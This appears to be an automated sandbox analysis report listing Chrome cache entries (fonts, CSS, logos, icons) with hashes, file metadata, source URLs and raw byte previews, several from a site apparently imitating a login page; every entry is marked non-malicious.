url(https://fonts.gstatic.com/s/googlesans/v58/4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RFD48TE63OOYKtrwEIJlopynSEg.woff2)

Chrome Cache Entry: 162

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
Category:	downloaded
Size (bytes):	15344
Entropy (8bit):	7.984625225844861
Encrypted:	false
SSDEEP:
MD5:	5D4AEB4E5F5EF754E307D7FFAEF688BD
SHA1:	06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
SHA-256:	3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
SHA-512:	7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
Malicious:	false
Reputation:	low
URL:	https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
Preview:	wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h\|.l....A....b6........(......@e.]...:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P\|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].\|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)\|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed..'..qP....M..j....../.z&.=...q<....-..?.A.%..K..

Chrome Cache Entry: 164

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format, TrueType, length 36696, version 1.0
Category:	downloaded
Size (bytes):	36696
Entropy (8bit):	7.988666025644622
Encrypted:	false
SSDEEP:
MD5:	A69E9AB8AFDD7486EC0749C551051FF2
SHA1:	C34E6AA327B536FB48D1FE03577A47C7EE2231B8
SHA-256:	FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
SHA-512:	9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/fonts/GDSherpa-regular.woff
Preview:	wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z\|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.\|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......\|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... gM..h.....Q!}B...Q.m.M...R.5.JUi..U_5@]..PW...5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.V..j.Z...j..BJ.._Pw..0..f...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e\|......B>....1.a,.D.Ej..(.

Chrome Cache Entry: 165

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (17011), with CRLF line terminators
Category:	downloaded
Size (bytes):	17013
Entropy (8bit):	5.085803632347877
Encrypted:	false
SSDEEP:
MD5:	0708BD3BA8B1485161424BFB0AEB8D10
SHA1:	D5F92544857E3A816F31A65257A7D62D5D5EB5E0
SHA-256:	DADA45192483DDD53A42C822D40802CDAB45ECDA38C9F7F213405F30DAB53798
SHA-512:	4DF0FE041F2CC43F86BD9E69D501C27FBA0F998C7A3EF67C1067C02099CDD69B782593EC09C1DAF74B23AB991DEEA66FB95D82E8CC719518C9B133F715F4795F
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/css/pages.min.css?cb=26
Preview:	,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections .opts:hover,.back:hover,.row.tile:not(.no-pick):hover{background-color:rgba(0,0,0,.1)}.radio label,.row.tile:not(.no-pick),a.link{cursor:pointer}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle},input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy{display:flex;flex-direction:column;height:100vh}body{background-color

Chrome Cache Entry: 166

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 260 x 32, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	6428
Entropy (8bit):	7.571362419106007
Encrypted:	false
SSDEEP:
MD5:	D3F69BE16BAF7ACEF2E7F4DD03729866
SHA1:	E11AA0084B93253A24DD3ED57DDDE66D27C84D2B
SHA-256:	3A5EEEA11E1041DB96B81498AB69C050DD045D9E56C69E19BD98430BA752165F
SHA-512:	F48F413B3F64F55D17BA538F7000AB233E6C7E6A6390D38810CA4AF809ED3643209F0FF2952C466E7D9265F8A9B9D90DC39E946FA6DD8BA9243EC33EA6545DE1
Malicious:	false
Reputation:	low
URL:	https://adfs.heart.org/adfs/portal/logo/logo.png
Preview:	.PNG........IHDR....... ......B......sRGB.........gAMA......a.....pHYs...........k.....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>..<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c143 79.161356, 2017/09/07-01:11:22 ">.. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">.. <rdf:Description rdf:about="" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:Iptc4xmpCore="http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" photoshop:AuthorsPosition="American Heart Association Logo" xmpRights:Marked="True" xmp:MetadataDate="2018-07-06T10:45:43-05:00" xmpMM:InstanceID="xmp.iid:d37a7f1b-4a36-443d-8007-bc6e33b55e94" xmpMM:DocumentID="xmp.did:d37a7f1b-4a36-443d-8007-bc6e33b55

Chrome Cache Entry: 168

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	7390
Entropy (8bit):	4.02755241095864
Encrypted:	false
SSDEEP:
MD5:	B59C16CA9BF156438A8A96D45E33DB64
SHA1:	4E51B7D3477414B220F688ADABD76D3AE6472EE3
SHA-256:	A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
SHA-512:	2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
Preview:	<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14

Chrome Cache Entry: 170

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
Category:	downloaded
Size (bytes):	34494
Entropy (8bit):	3.028102929129642
Encrypted:	false
SSDEEP:
MD5:	88415ACDA09A4CBD9D87543C3BA78180
SHA1:	2DEC4705E9AB399EFDC6EEF36E079AA31D1DF8D9
SHA-256:	20CCCC47C1BAC9D2EF36B6A1C58AF58C5C169AD5CA084080F0392B86F949641C
SHA-512:	77D0D7E0C85A1CAD6A22372F2D3904C0842628CE7F1ADAC9A2A0CBF3B566CE8148527B0E7EDE2BB068F5D005917B3F95C2A25D031D0D4D7A6A5A117CEFA83B24
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/cloudfavicon.ico
Preview:	............ .h...V......... ......... .... .....F...00.... ..%......@@.... .(B...D..(....... ..... ............................................................................................................................................................................................................................................................................................h...........................................................Zd... ... ... ... ... ... ... ... ... ...B.......N...@...@...s......6.... ... ...?...[...a...g...l...r...............}...M...............m... ... ... ... ... ... ... ... ...[...j...@...d..................P ... ... ... ... ... ... ... ... ..........X.......................6...Hf... ... ... ... ... ...B...........................................G... ... ... ...5......2...............................................X.......f..................................................................................................................................

Chrome Cache Entry: 98

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format, TrueType, length 35970, version 1.0
Category:	downloaded
Size (bytes):	35970
Entropy (8bit):	7.989503040923577
Encrypted:	false
SSDEEP:
MD5:	496B7BBDE91C7DC7CF9BBABBB3921DA8
SHA1:	2BD3C406A715AB52DAD84C803C55BF4A6E66A924
SHA-256:	AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
SHA-512:	E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/fonts/GDSherpa-bold.woff
Preview:	wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.\|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........

Chrome Cache Entry: 99

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	727
Entropy (8bit):	7.573165690842521
Encrypted:	false
SSDEEP:
MD5:	839CB0F55C3D2D5C2F740BDA95CB2878
SHA1:	93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
SHA-256:	40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
SHA-512:	ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/key.png
Preview:	.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X\|o..K....w...8........i8L..6P\|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E\|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.

Static File Info

⊘No static file info